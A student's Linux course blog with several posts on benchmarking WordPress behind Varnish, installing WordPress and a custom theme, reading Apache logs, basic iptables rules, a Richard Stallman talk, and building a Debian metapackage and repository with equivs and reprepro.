$ ab -c 150 -n 1000 http://localhost/~tuukka/static

Here are the results in one image:

combination-novarnish

At this point I realised I might be doing something wrong, since the results were so close to each other. (In hindsight the first test may also have been skewed because http://localhost/~tuukka/wordpress, without a trailing slash, answers with a cheap redirect rather than the full page.) I made a fresh install of WordPress and wrote a new post. I also made a static version of that post's page. Here is the new page:

benchmark

I ran the same tests again with the new pages.

$ ab -c 150 -n 1000 http://localhost/~tuukka/wordpress/?p=4
$ ab -c 150 -n 1000 http://localhost/~tuukka/static/index.html

combined1

I got totally different results with the new setup. 1000 page loads, 150 at a time, took 24.157 seconds with the dynamic page and 0.049 seconds with the static page.
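Put another way, throughput is completed requests divided by total time, which makes the gap easier to grasp:

```shell
# Requests per second = completed requests / total test time
awk 'BEGIN { printf "dynamic: %.1f req/s\n", 1000 / 24.157 }'
awk 'BEGIN { printf "static: %.0f req/s\n", 1000 / 0.049 }'
```

So the static page served roughly 500 times more requests per second than the dynamic one on the same hardware.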

Varnish installation

I installed the package:

$ sudo apt-get update
$ sudo apt-get install varnish

Then I made Apache listen on port 8080 instead of the default 80 by editing the NameVirtualHost and Listen lines in ports.conf.
$ sudoedit /etc/apache2/ports.conf

# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default
# This is also true if you have upgraded from before 2.2.9-3 (i.e. from
# Debian etch). See /usr/share/doc/apache2.2-common/NEWS.Debian.gz and
# README.Debian.gz

NameVirtualHost *:8080
Listen 8080

<IfModule mod_ssl.c>
    # If you add NameVirtualHost *:443 here, you will also have to change
    # the VirtualHost statement in /etc/apache2/sites-available/default-ssl
    # to <VirtualHost *:443>
    # Server Name Indication for SSL named virtual hosts is currently not
    # supported by MSIE on Windows XP.
    Listen 443
</IfModule>

I also made changes to /etc/apache2/sites-enabled/000-default, as the comment in ports.conf suggested.

$ sudoedit /etc/apache2/sites-enabled/000-default
Changed: VirtualHost *:80 -> VirtualHost *:8080

ServerName tuukka-xubuntu
<VirtualHost *:8080>
        ServerAdmin webmaster@localhost

        DocumentRoot /var/www
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>

I tested whether it was working by restarting Apache and trying to load the page.

$ sudo service apache2 restart
$ firefox localhost
This led me to an "Unable to connect" page.
$ firefox localhost:8080
Worked perfectly!

Then came the Varnish setup. I made changes to /etc/default/varnish.

$ sudoedit /etc/default/varnish
There were different setups ready to use. By default it was using the "Alternative 2" configuration, which uses VCL. I decided to stick with it and changed the port on the line starting with DAEMON_OPTS:

...
## Alternative 2, Configuration with VCL
#
# Listen on port 6081, administration on localhost:6082, and forward to
# one content server selected by the vcl file, based on the request.  Use a 1GB
# fixed-size cache file.
#
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"
...

Then I restarted Varnish and checked whether it was working.

$ sudo service varnish restart
$ firefox localhost
This led me to Apache's default "It works" page, and I knew Varnish was working, since Apache is no longer listening on the default port.

Benchmark with varnish

Varnish was now configured and working. I ran the same tests again.

$ ab -c 150 -n 1000 http://localhost/~tuukka/wordpress/?p=4
$ ab -c 150 -n 1000 http://localhost/~tuukka/static/index.html

With the dynamic page the improvement was clear. With the static page it was not: the static page was actually slower to load than the dynamic one. I do not know the reason for certain; one likely explanation is that Apache serves a small static file almost for free, so putting a proxy hop in front of it can only add overhead. I ran the test a couple of times and all the results were almost the same. Here are example results:

combined2

Summary of the benchmark

Dynamic page
Without varnish:
Time taken for tests: 24.157 seconds
Longest request: 9931 ms

With varnish:
Time taken for tests: 2.525 seconds
Longest request: 2489 ms

Static page
Without varnish:
Time taken for tests: 0.049 seconds
Longest request: 13 ms

With varnish:
Time taken for tests: 3.944 seconds
Longest request: 3927 ms

Based on these results I would say Varnish is a must if there is a huge amount of traffic to dynamic pages.

How to make .iso images bypass Varnish

First I tried what happens when downloading an .iso image through Varnish. I downloaded the xubuntu-13.10 .iso and put it under public_html. When I tried to download it, I got this funny Guru Meditation page. I am not quite sure of the exact reason; I guess it might be related to Varnish's memory, since the malloc cache configured above is only 256 MB, which is smaller than the image.

$ firefox localhost/~tuukka/xubuntu-13.10-desktop-i386.iso

gurumeditation

I googled a bit and found Jukka Pentti's blog. He had tried to make this work by editing /etc/varnish/default.vcl but had not tested it.

$ sudoedit /etc/varnish/default.vcl
I added this:

if (req.url ~“\.iso$”) {
 set req.backend = web;
 pass;
 }

 

$ sudo service varnish restart
At this point I got this message:

 * Stopping HTTP accelerator varnishd                                  [ OK ] 
 * Starting HTTP accelerator varnishd                                  [fail] 
Message from VCC-compiler:
Syntax error at
('input' Line 12 Pos 14)
if (req.url ~“\.iso$”) {
-------------#--------------

Running VCC-compiler failed, exit 1

VCL compilation failed

 

Obviously there was something wrong with the snippet I had just added to default.vcl. In hindsight, the curly quotation marks around "\.iso$" are the likely culprit: the VCC compiler points right at them, and VCL only accepts plain ASCII double quotes. I tried some debugging but did not solve it at the time. I decided to google again and found mikkott's blog, where he solved the problem by passing all files over 200 MB straight through Varnish.

$ sudoedit /etc/varnish/default.vcl
I added this below the default backend definition:

sub vcl_recv {
 if (req.http.x-pipe && req.restarts > 0) {
  remove req.http.x-pipe;
  return (pipe);
 }
}

sub vcl_fetch {
 if (beresp.http.Content-Length ~ "[0-9]{8,}" ) {
  set req.http.x-pipe = "1";
  return (restart);
 }
}

 

Then I restarted Varnish and tried to download .iso again.

$ sudo service varnish restart

$ firefox localhost/~tuukka/xubuntu-13.10-desktop-i386.iso
After that the Guru did not meditate again, and I was able to download the .iso!

download

Page analysis with yslow

YSlow is a plugin for Firefox. I installed it from Firefox's add-ons manager. It was not working out of the box; it turned out to need the Firebug plugin. I installed Firebug and restarted Firefox, ran an inspection with Firebug (right-clicked somewhere on a page) and after that YSlow was working too.

I decided to analyse two well-known Finnish sites, mtv3.fi and yle.fi. Here are the results in one image:

combined_yslow

Overall scores:

yle.fi
Grade: D
Overall performance score 69

mtv3.fi
Grade: D
Overall performance score 60

http://localhost/~tuukka/wordpress/ (this is the page used in varnish test)
Grade: A
Overall performance score 94

Based on these results it seems mtv3.fi is a little faster to load. YSlow gave lots of information about both sites. If I wanted to make yle.fi load faster, I would start with these high-priority YSlow suggestions:

This page has 13 external Javascript scripts. Try combining them into one.
This page has 4 external stylesheets. Try combining them into one.
This page has 25 external background images. Try combining them with CSS sprites.

 

Sources

http://terokarvinen.com/2013/aikataulu-–-linux-palvelimena-ict4tn003-11-ja-12-kevaalla-2014
Varnishin ja Nginx asennus Ubuntu serveriin (Varnish and Nginx installation on an Ubuntu server)
http://jukkapentti.wordpress.com/tag/varnish/

Free .tk domain, does it work?

March 9, 2014

This post is part of Tero Karvinen's course: Linux as server. Even though it is related to a school assignment, it offers useful information about GNU/Linux!

My friend is kind of exact when it comes to money (something for me to learn). He was blogging on my server and used the IP address to access his blog. I thought that was a very bad idea and started to find out whether there was a cheap solution. Then I heard about dot.tk: they promise a free domain, and I could not believe it. Well, I tried it, and it seems there is such a thing as free. Here is how I did it.

First I went to http://dot.tk

Then I entered the domain and clicked Go. After that I needed to fill in some information specific to my VPS provider, Linode.

aa

a

That's pretty much it; I would say "less is more" is what they are thinking at dot.tk. Then I added a domain zone in my Linode Manager.

c

d

The DNS configuration was done. I tested whether it worked.

$ firefox http://markushenri.tk

It led to the right place (my server), so it was working. I wanted to point it to my friend's blog, so I did the virtual host configuration.

$ sudoedit /etc/apache2/sites-available/markushenri.tk.conf

Added this:

# domain: markushenri.tk
# public: /home/example/public_html

<VirtualHost *:8080>
  # Admin email, Server Name (domain name), and any aliases
  ServerAdmin henri@markushenri.tk
  ServerName  www.markushenri.tk
  ServerAlias markushenri.tk

  # Index file and Document Root (where the public files are located)
  DirectoryIndex index.html index.php
  DocumentRoot /home/example/public_html/

  # Log file locations
  LogLevel warn
  ErrorLog  /home/example/public_html/log/error.log
  CustomLog /home/example/public_html/log/access.log combined
</VirtualHost>
Please note that to make this work, you need to create the log folder inside public_html. I had done that before; more information here.

Then ctrl+x -> y -> ENTER
$ sudo a2ensite markushenri.tk.conf
$ sudo service apache2 restart

Then I tested if it is working.

$ firefox http://www.markushenri.tk

BOOM it was pumping!

Linux as server #6 – WordPress installation and customization

March 9, 2014

This post is part of Tero Karvinen's course: Linux as server. Even though it is related to a school assignment, it offers useful information about GNU/Linux!

Another school mission from Mr. Karvinen.

  • Install WordPress
  • Make theme
  • Change theme
  • How to upload images and themes without ssh/ftp access

All tests made with Xubuntu 12.04 LTS Precise Pangolin 32bit.

Hardware:

  • Motherboard: Asus Z87-C
  • CPU: Intel Core i5-4670K 3.40GHz
  • RAM: 8GB DDR3 1600MHz
  • HDD: 120GB SSD Sata 3.0
  • GPU: Geforce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Asus cd/dvd

Installation

I had already configured LAMP. The first thing I decided to do was create a database for the fresh installation. I am used to working with phpMyAdmin, so that is what I used.

First I clicked the Privileges tab and then Add a new user.

Screenshot - 03092014 - 03:19:58 PM

The form asked for a user name, host and password. I also checked "Create database with same name and grant all privileges". After that I clicked Create user.

1

2

Then I checked that the database appeared in phpMyAdmin.

3
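As a side note, the same database and user can also be created from the MySQL command line instead of phpMyAdmin. A sketch, assuming the database and the user are both called wordpress (pick your own password); this is the MySQL 5.5 era syntax shipped with Ubuntu 12.04:

```shell
$ mysql -u root -p
mysql> CREATE DATABASE wordpress;
mysql> GRANT ALL PRIVILEGES ON wordpress.* TO 'wordpress'@'localhost' IDENTIFIED BY 'changeme';
mysql> FLUSH PRIVILEGES;
```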

Database done! Then I headed to wordpress.org and looked up the download URL.

4

I wanted to install WordPress into tuukka's Apache userdir, so I did this:

$ cd /home/tuukka/public_html/
$ wget http://wordpress.org/latest.tar.gz
$ tar -xf latest.tar.gz
$ ls
5

After extracting the files and finishing the pre-setup, I did the actual installation.

$ firefox http://localhost/~tuukka/wordpress

Then I followed the first two steps, mostly just clicking Next.

6

7

The third page was the important one: the setup program asked for the details of the database I had made earlier.

8

Please note that the password in this screenshot is different from the password shown earlier. After taking the screenshot I accidentally clicked Generate password again, so my passwords were in fact the same; they differ only in these screenshots!

I got the notice "Sorry, but I can't write the wp-config.php file.", so I created wp-config.php myself by copy-pasting the content shown into a file made with nano.

Copypaste the whole box!

$ cd /home/tuukka/public_html/wordpress/
$ nano wp-config.php
Paste the config -> ctrl+x -> y -> ENTER

Then I ran the install.

10

The last step before the install was the basic information about the blog.
11

12

Finally the blog was installed! I tested it by pressing Log in, and everything worked fine.

13

 

Make theme

I have tried to dodge this for so long. Now it was there again, and I decided to face it like a man. I did some research and found a very nice video by a guy called JREAM; the video can be found here. I would highly recommend it to everyone who would like to build a theme from scratch!

First I watched the video a couple of times to get the idea. Then I followed it step by step, doing everything like JREAM did. Finally I was at the same point he was at the end of the video.

Screen Shot 2014-03-10 at 12.08.18 AM

At this point I was so into theme making that I totally lost track of time. I spent the next 24 hours basically living in NetBeans, and here is the result:

Screen Shot 2014-03-09 at 11.58.26 PM

Online demo!

I might explain later more specific details what I did. If you like to learn to make themes right now: watch the video!

Change theme

A WordPress theme is a package of files which you can just copy into any WordPress installation and then activate from the Dashboard. The theme I had just made contains the following files:

$ cd bemytheme/
$ ls -a

.   comments.php  functions.php  index.php  sidebar.php  style.css
..  footer.php    header.php     page.php   single.php   style-grey.css
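As a side note: of the files above, only index.php and style.css are strictly required for WordPress to recognize a theme, and the recognition happens through a comment header at the top of style.css. A minimal sketch (the names and values here are illustrative, not my actual theme's):

```css
/*
Theme Name: bemytheme
Author: Tuukka
Description: Minimal example header; WordPress reads this comment
  block from style.css to list the theme in the Dashboard.
Version: 1.0
*/
```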

I started by compressing the whole theme folder into a .zip file on my Mac. After that I used scp to transfer the zip to my server. On the server I did the following:

$ unzip bemytheme.zip
$ mv bemytheme public_html/wordpress/wp-content

Then I opened my WordPress Dashboard and went to Appearance -> Themes. I could not see my theme on the list and started to worry. I still had an open SSH connection to my server, so I started troubleshooting.

$ cd public_html/wordpress/wp-content/
$ ls

bemytheme  index.php  plugins  themes

There was my problem: bemytheme was in the wrong directory. It was supposed to be in themes, so I moved it.

$ mv bemytheme/ themes/

After that I refreshed the Dashboard page in the browser and bemytheme appeared.

themee

I clicked Activate and went to the site to check whether the theme was working, and it was!

themeee

How to upload images and themes without ssh/ftp access

Alright, I had a fresh installation of WordPress, and I had even installed a custom-made theme over an SSH connection. But what if I want to do it without SSH/FTP access? I started investigating and found this page.

First I simply tried to upload an image and a theme in the WordPress Dashboard, and I got these error messages (the first is related to the image, the second to the theme at Appearance -> Themes):

upload1

upload2

I already knew the problem might be solved by giving 777 permissions to the wp-content folder, but I did not want to do that: it would be an unnecessary security risk. Instead I decided to give ownership of the wp-content folder and its contents to the www-data user.

$ cd
$ cd public_html/wordpress/
$ sudo chown -R www-data wp-content
$ sudo chmod -R 755 wp-content

After that I tried to upload the image and the theme again in the Dashboard. The image upload went well. Then I tried to upload the theme at Appearance -> Themes:

upload3

I chose Upload, browsed to the theme (http://wordpress.org/themes/radiate) on my hard drive and pressed Install Now. It led me to this page:

upload4

That was obviously something I did not want to do. I decided to try another method, mentioned in a Stack Overflow topic: user Nadeem Haidar wrote that he had fixed the problem by adding one line to the wp-config.php file: define('FS_METHOD', 'direct'); This constant tells WordPress to write files directly as the web server user (www-data here) instead of asking for FTP credentials.

$ cd public_html/wordpress/
$ nano wp-config.php
at the bottom of the file I added this:
define('FS_METHOD', 'direct');
ctrl+x -> y -> ENTER

Once more I tried to upload the theme in the WordPress Dashboard. It worked perfectly! I activated it, visited the site, and the new theme was there.

upload6

upload7

 

Sources

Karvinen, Tero: Lessons 2013-03-03, Linux as server

http://stackoverflow.com/questions/640409/can-i-install-update-wordpress-plugins-without-providing-ftp-access

 

Apache installation, log analysis and basic firewall settings

March 6, 2014

greens-beach-196825_640

Apache has been the most popular HTTP server since 1996. It is used everywhere. I installed Apache, generated some log entries, analysed them, and finally added some firewall rules with iptables.

Hardware:

  • Motherboard: Asus Z87-C
  • CPU: Intel Core i5-4670K 3.40GHz
  • RAM: 8GB DDR3 1600MHz
  • HDD: 120GB SSD Sata 3.0
  • GPU: Geforce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Asus cd/dvd

All tests were made with Xubuntu 12.04 LTS Precise Pangolin 32-bit in live mode (live CD).

Apache installation

I started by updating package list from default repositories.
$ sudo apt-get update

Apache2 installation and testing
$ sudo apt-get install apache2
$ firefox http://localhost

Firefox opened a page starting with "It works! This is the default web page for this server.", so the Apache installation had succeeded.

Log entries

By default Apache stores its logs in /var/log/apache2.

There are three .log files: access.log, error.log and other_vhosts_access.log. I wanted to generate an entry in error.log. The default user on my live CD is called xubuntu, so I tried to access xubuntu's home page.
$ firefox http://localhost/~xubuntu

That led to a 404 Not Found page, so I checked error.log to see what was wrong.
$ less /var/log/apache2/error.log
At the bottom of the error.log was this line:
[Thu Mar 06 13:16:04 2014] [error] [client 127.0.0.1] File does not exist: /var/www/~xubuntu

It told me that Apache did not find any files at /var/www/~xubuntu. That is not where I want to store users' home pages.

I decided to enable userdirs.
$ sudo a2enmod userdir
$ sudo service apache2 restart

After that I tried to access xubuntu's home page again.
$ firefox http://localhost/~xubuntu

Same 404 Not Found page again. Then I checked the logs.
$ less /var/log/apache2/error.log
[Thu Mar 06 13:24:35 2014] [error] [client 127.0.0.1] File does not exist: /home/xubuntu/public_html
It told me that userdirs were now working, but there was nothing at that location.

I fixed the problem by making a public_html directory in xubuntu's home directory and adding a file containing some random text.
$ cd
$ mkdir public_html
$ cd public_html
$ nano index.html

Typed: random text -> ctrl+x -> Y -> ENTER
$ firefox http://localhost/~xubuntu

Finally the 404 page was beaten and there was a page with "random text".

Then I opened Apache's access.log. The time was now 13:32.
$ less /var/log/apache2/access.log
The line at the bottom was:
127.0.0.1 – – [06/Mar/2014:13:29:55 +0000] “GET /~xubuntu/ HTTP/1.1” 200 366 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0”

What does this mean?

/etc/apache2/apache2.conf is the main configuration file. Its LogFormat directive specifies which information is logged and in which order. In my case the format was:

LogFormat “%h %l %u %t \”%r\” %>s %O \”%{Referer}i\” \”%{User-Agent}i\”” combined

127.0.0.1: IP address of the client (%h). This is my own IP since I did the testing on the same computer where Apache is running; specifically it is my loopback adapter's address.

– – : The hyphens mean the requested information is not available. The remote logname (%l) and the remote user (%u) would be displayed here.

[06/Mar/2014:13:29:55 +0000]: Timestamp of the request (%t).

"GET /~xubuntu/ HTTP/1.1": Request line from the client (%r).

200 366: Status code sent from the server to the client (%>s, here 200 OK), followed by the size of the response in bytes (%O).

"-": Hyphen again. This field is the Referer, the page that linked to this URL; a hyphen means there was none.

"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0": The User-Agent, i.e. the client's browser identification.
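Because the combined format is space-separated, the interesting fields can be pulled out with awk; a small sketch using the log line above (the User-Agent is shortened here):

```shell
LOG='127.0.0.1 - - [06/Mar/2014:13:29:55 +0000] "GET /~xubuntu/ HTTP/1.1" 200 366 "-" "Mozilla/5.0"'
# With awk's default space splitting, the fields line up as:
# $1 = client IP, $9 = status code, $10 = response size in bytes
echo "$LOG" | awk '{ print "ip=" $1, "status=" $9, "bytes=" $10 }'
```

Run against the whole access.log, the same one-liner is a quick way to spot error statuses or unusually large responses.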

Iptables

My goal was to set the firewall to block all incoming traffic except requests to Apache. What I needed to do was drop everything except input to port 80.

First I dropped all inputs.
$ sudo iptables -P INPUT DROP

Then I added an exception to accept input to port 80.
$ sudo iptables -I INPUT -s 0.0.0.0/0 -p tcp --dport 80 -j ACCEPT

I tested with my MacBook Pro, which is on the same network. I started Firefox, entered the Linux machine's IP address (10.0.1.11) in the URL field and pressed Enter. Everything worked fine and I was looking at Apache's default "It works!" page.

Finally I wanted to test whether the firewall was really working. I installed an SSH server and tried to open an SSH connection from my MacBook.

I removed firewall rules and installed openssh-server.
$ sudo iptables -P INPUT ACCEPT
$ sudo iptables -F
$ sudo apt-get install openssh-server

Then, on the Mac, I opened a connection.
$ ssh xubuntu@10.0.1.11
$ exit
It worked fine.

After test I re-added the firewall rules.
$ sudo iptables -P INPUT DROP
$ sudo iptables -I INPUT -s 0.0.0.0/0 -p tcp --dport 80 -j ACCEPT

Then I tried the SSH connection from the Mac again.
$ ssh xubuntu@10.0.1.11
No answer!

Now I am pretty sure the firewall is working. At least port 22 is blocked! :p
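One caveat worth noting: the DROP policy plus the single ACCEPT rule above also blocks loopback traffic and the replies to the server's own outgoing connections (apt-get, DNS lookups and so on). A slightly fuller sketch of the same idea, using the same iptables syntax, would be:

```shell
# Policy: drop everything that is not explicitly allowed
sudo iptables -P INPUT DROP
# Keep loopback traffic working (many local services depend on it)
sudo iptables -A INPUT -i lo -j ACCEPT
# Let replies to the server's own outgoing connections back in
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Allow HTTP to Apache
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
```

With the state rule in place, the server can still initiate connections outward even though unsolicited input is dropped.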

Sources:

Karvinen, Tero: Lessons 2013-03-03, Linux as server

Merilinna, Juhani: Lessons 2013-02-28, Linux basics

http://httpd.apache.org/docs/1.3/logs.html

http://stackoverflow.com/questions/9234699/understanding-apache-access-log

http://en.wikipedia.org/wiki/Apache_HTTP_Server

3D printed record aka. vinyl!

March 1, 2014

Alongside studying I do DJ gigs on weekends. I saw this video where a 3D-printed vinyl record really works. This is something that is going to blow up the bank! It is a way to integrate the new and the old school.

Nowadays it's easy to buy music from online stores in your favourite audio format. In the future it may be possible to buy it and print it to vinyl, getting back to old-school-style DJing. THIS IS COOL!

At the moment a decent 3D printer costs about 1500 euros, and prices are expected to go down soon. There are many manufacturers; I will mention just one which I know is good and costs ~1500 euros: http://www.minifactory.fi/en/

You can see the full article here: http://www.instructables.com/id/3D-Printed-Record/

Useful Linux/Unix terminal tools by Kristof Kovacs

March 1, 2014

I was doing my regular Internet surfing and ended up on Hacker News. Anything related to Linux/Unix always gets my attention; this time it was Kristof Kovacs' little collection of useful terminal tools. I bet there is something for everyone!

http://kkovacs.eu/cool-but-obscure-unix-tools/

tux-36010_640

Linux as server #5 – VPS and virtual hosts

February 27, 2014

This post is part of Tero Karvinen's course: Linux as server. Even though it is related to a school assignment, it offers useful information about GNU/Linux!

A VPS (virtual private server) is a virtual machine where you can do anything you like; well, not anything, but almost. You get a slot on a server where you can install an operating system, and you get full access to it. For example, if you choose to install Ubuntu on your VPS, you are able to use sudo.

If you have multiple domains like I have, you might end up at a point where you would like to route them to the same server. Virtual hosts make it possible to point different domains to different directories on the server. For example, the deejayrakfield.com and tuukkamerilainen.com domains point to the same server but different directories.

Mission

The fifth lesson of Tero Karvinen's Linux as a server course is done, and we are about to:

  • Register and configure VPS
  • Try virtual hosts

VPS (Virtual private server)

I had already done this section by hosting my own websites on a VPS. I decided to rent a VPS from Linode: $20 per month and I am able to run my very own server. After I realised how cheap and easy it is to rent a VPS, I have no interest in owning real hardware. Those days are gone.

My Linode's specs:

  • 1GB RAM
  • 8 Processors (1x priority)
  • 48GB Storage
  • 2TB Transfer
  • Cost: 20$
  • Ubuntu 12.04 LTS 64bit

Transfer and cost are per month.

Virtual hosts

I followed Linode's documentation. Before starting the virtual host configuration I had already registered a domain (tuukkamerilainen.com), made changes to the zone files, and added DNS records in Linode's DNS Manager.

I started by creating a new configuration in /etc/apache2/sites-available/:

sudo nano /etc/apache2/sites-available/tuukkamerilainen.com.conf

# domain: example.com
# public: /home/example_user/public/example.com/

<VirtualHost *:80>
  # Admin email, Server Name (domain name), and any aliases
  ServerAdmin webmaster@example.com
  ServerName  www.example.com
  ServerAlias example.com

  # Index file and Document Root (where the public files are located)
  DirectoryIndex index.html index.php
  DocumentRoot /home/example_user/public/example.com/public

  # Log file locations
  LogLevel warn
  ErrorLog  /home/example_user/public/example.com/log/error.log
  CustomLog /home/example_user/public/example.com/log/access.log combined
</VirtualHost>

 

I am not going to show my exact server configuration. Mainly, I replaced example.com with my own domain and pointed the configuration at the directory where my WordPress content lives.
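That substitution can be sketched with sed (a hypothetical one-liner, not necessarily how I edited the file; the domain below simply stands in for whichever site is being configured):

```shell
# Rewrite the template's placeholder domain to the real one.
# The template lines are fed in via printf for illustration;
# in practice the input would be the copied .conf file.
printf 'ServerName  www.example.com\nServerAlias example.com\n' \
  | sed 's/example\.com/tuukkamerilainen.com/g'
```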

With the config done, I enabled the site and restarted Apache

sudo a2ensite tuukkamerilainen.com.conf

sudo service apache2 restart

Everything is nice: tuukkamerilainen.com works while deejayrakfield.com still returns a different site!

Source

https://library.linode.com/hosting-website#sph_configuring-name-based-virtual-hosts

Karvinen, Tero: Lessons 2013-02-24, Linux as server

Happy Hacking day 2014 with Mr. Richard Stallman

February 26, 2014

Happy Hacking Day 2014 was held on 11 February at Haaga-Helia's campus in Pasila. The event gathered lots of IT people under the same roof and offered high-class information technology to explore, such as 3D printing gear and plenty of lectures by professionals.

The highlight of the day was Mr. Richard Stallman's lecture about free software and the GNU license. The organizers of the event ranked Mr. Stallman as one of the biggest heroes of the Internet. His number one piece of work is definitely the GNU General Public License and the GNU project.

An 80-minute slot was reserved for Mr. Stallman's speech, and the time really flew. In my opinion it is one of the best IT speeches ever.

 The Internet Hall of Fame hero Dr. Richard Stallman

Mr. Stallman entered the room to huge applause; it was the moment everyone had waited for the most. He started by requesting that everyone taking photos not upload them to Facebook. After the social-media criticism he required that every video taken during his speech be published in a free video format such as .ogg.

The speech focused entirely on introducing the GNU license and the history of open source and free software. It taught me a lot: I realised I had totally misunderstood the whole thing. I used to think open source and free software were roughly the same, but they definitely are not. An open source program's source code may be free to explore, but you are not necessarily free to modify it and use the customized version. With free software you can do anything you like, not just explore the code.

Some examples:

Open source software

  • Android
  • Ubuntu

Free software

  • Mozilla firefox
  • VLC Mediaplayer
  • WordPress
  • gNewSense, a GNU/Linux

Near the end of the speech Mr. Stallman auctioned off a stuffed animal. It was a funny moment, though it might not pass every Finnish law. He reserved some time for questions, and one of them was: "How am I supposed to pay my bills if I am not allowed to code anything other than free software?" Mr. Stallman answered along these lines: "In my opinion nobody should write non-free code for money; go get a day job and code in your free time at home."

Big brother of the world, does it exist?

Mr. Stallman heavily underlined: if you use free software, you can be more confident that no rootkit or malware is included. But if you use software like Windows or Ubuntu, you can be damn sure somebody is watching you. I totally agree.

Videos of the speech here.

 

Changing the language // Kielen vaihto

February 24, 2014

I started this blog about a month ago to report on school assignments. After a couple of posts I realised it is actually quite fun to write a blog. Not just fun: it is a pure way of learning, and when you need to remember something from the past, you have a place to check.

Now I am ready to move to the next level. For a Finn like me, that means writing the blog in English. The next assignment will be posted only in English. We'll see how it goes. ^_^

Aloitin blogin noin kuukausi sitten pääasiassa koulutehtävien raportoimiseksi. Muutaman postauksen jälkeen tajusin blogin pitämisen olevan todella hauskaa. Eikä pelkästään vain hauskaa. Se on oivallinen tapa oppia ja paikka johon palata muistelemaan miten asian olen ratkaissut aiemmin.

Olen nyt valmis siirtymään seuraavalle tasolle. Tässä kohtaa se tarkoittaa blogiin kirjoittamista englanniksi. Seuraavan postauksen kirjoitan ainoastaan englanniksi. Nähtäväksi jää millainen on lopputulos. ^_^

Linux as a Server #4 – The Joy of Metapackages

February 23, 2014

Metapackages often come up when the strengths of Linux are discussed. Their purpose is to make installing software easier: in practice you create a package that lists the programs you want on the system, and installing it pulls in any number of programs automatically.

On the Linux as a Server course we got the following assignment:

  • Create a metapackage that installs your favourite programs. Make sure it passes lintian.
  • Create a package repository with reprepro
  • Package one of your scripts so that the package installs a new command for the system's users

For this assignment I used the same hardware as in the previous exercises, running Xubuntu 12.04 Precise Pangolin 32-bit.

Metapackage

Tero Karvinen has written an excellent guide to creating a metapackage. It uses the equivs program to build the package and gdebi to install it. I created mine as follows:

sudo apt-get update
sudo apt-get install equivs
equivs-control tuukkas-funnypack.cfg
nano tuukkas-funnypack.cfg

At this point tuukkas-funnypack.cfg was open in the nano editor, and I edited its contents to the following:

### Commented entries have reasonable defaults.
### Uncomment to edit them.
# Source: <source package name; defaults to package name>
Section: misc
Priority: optional
# Homepage: <enter URL here; no default>
Standards-Version: 3.9.2

Package: tuukkas-funnypack
Version: 0.1
# Maintainer: Your Name <yourname@example.com>
# Pre-Depends: <comma-separated list of packages>
Depends: sl, cowsay, fortune
# Recommends: <comma-separated list of packages>
# Suggests: <comma-separated list of packages>
# Provides: <comma-separated list of packages>
# Replaces: <comma-separated list of packages>
# Architecture: all
# Copyright: <copyright file; defaults to GPL2>
# Changelog: <changelog file; defaults to a generic changelog>
# Readme: <README.Debian file; defaults to a generic one>
# Extra-Files: <comma-separated list of additional files for the doc directory>
# Files: <pair of space-separated paths; First is file to include, second is destination>
#  <more pairs, if there's more than one file to include. Notice the starting space>
Description:
 This package contains all you need the most
 .
 It maintains to keep you shape when you are not
 .
 You should try to type sl or fortune -s | cowsay

The package thus installs the programs sl, cowsay and fortune. Next, build the package:

equivs-build tuukkas-funnypack.cfg

Equivs built the package without problems, and it appeared in my current directory as tuukkas-funnypack_0.1_all.deb.

My system did not have gdebi by default, so I installed it.

sudo apt-get install gdebi

After that I installed the metapackage.

sudo gdebi -n tuukkas-funnypack_0.1_all.deb

The installation succeeded without problems and I tested the installed programs.

sl
fortune
fortune -s | cowsay

The fun pack worked.

Next I installed lintian and checked the package.

sudo apt-get install lintian
lintian -c tuukkas-funnypack_0.1_all.deb

Lintian printed a notice:

E: tuukkas-funnypack: description-synopsis-is-empty

I edited the Description field in tuukkas-funnypack.cfg, adding the word Info: on the first line. I also bumped the version from 0.1 to 0.2.

Description: Info:
 This package contains all you need the most
 .
 It maintains to keep you shape when you are not
 .
 You should try to type sl or fortune -s | cowsay

I rebuilt and re-checked the package.

equivs-build tuukkas-funnypack.cfg
lintian -c tuukkas-funnypack_0.2_all.deb
lintian tuukkas-funnypack_0.2_all.deb

No error messages; I considered the package fully working.

Configuring the package repository

With the fun pack built, it needed a repository of its own. I again followed Tero Karvinen's guide on the subject.

The repository requires a working Apache with user home pages enabled. On my system this was already in place.

I created a directory inside the public_html directory in my home directory, whose contents Apache serves.

cd
cd public_html
mkdir -p repository/conf

Then I added a configuration file to the conf directory.

nano repository/conf/distributions

Codename: lucid
Components: main
Suite: lucid
Architectures: i386 amd64 source

The repository was now ready and waiting for packages. I added my fun pack.

reprepro -VVVV -b repository/ includedeb lucid tuukkas-funnypack_0.2_all.deb

Reprepro created directories and content under the repository directory as follows:

tuukka@tuukka-xubuntu:~/public_html/repository$ ls
conf  db  dists  pool

Testing the package repository

I decided to test installing the fun pack on the same machine where I created the repository.

I added the repository to the system's package sources

sudo nano /etc/apt/sources.list.d/repository.list

deb http://localhost/~tuukka/repository lucid main

Then I tested that it worked.

sudo apt-get update
sudo apt-get install tuukkas-funnypack

Reading package lists... Done
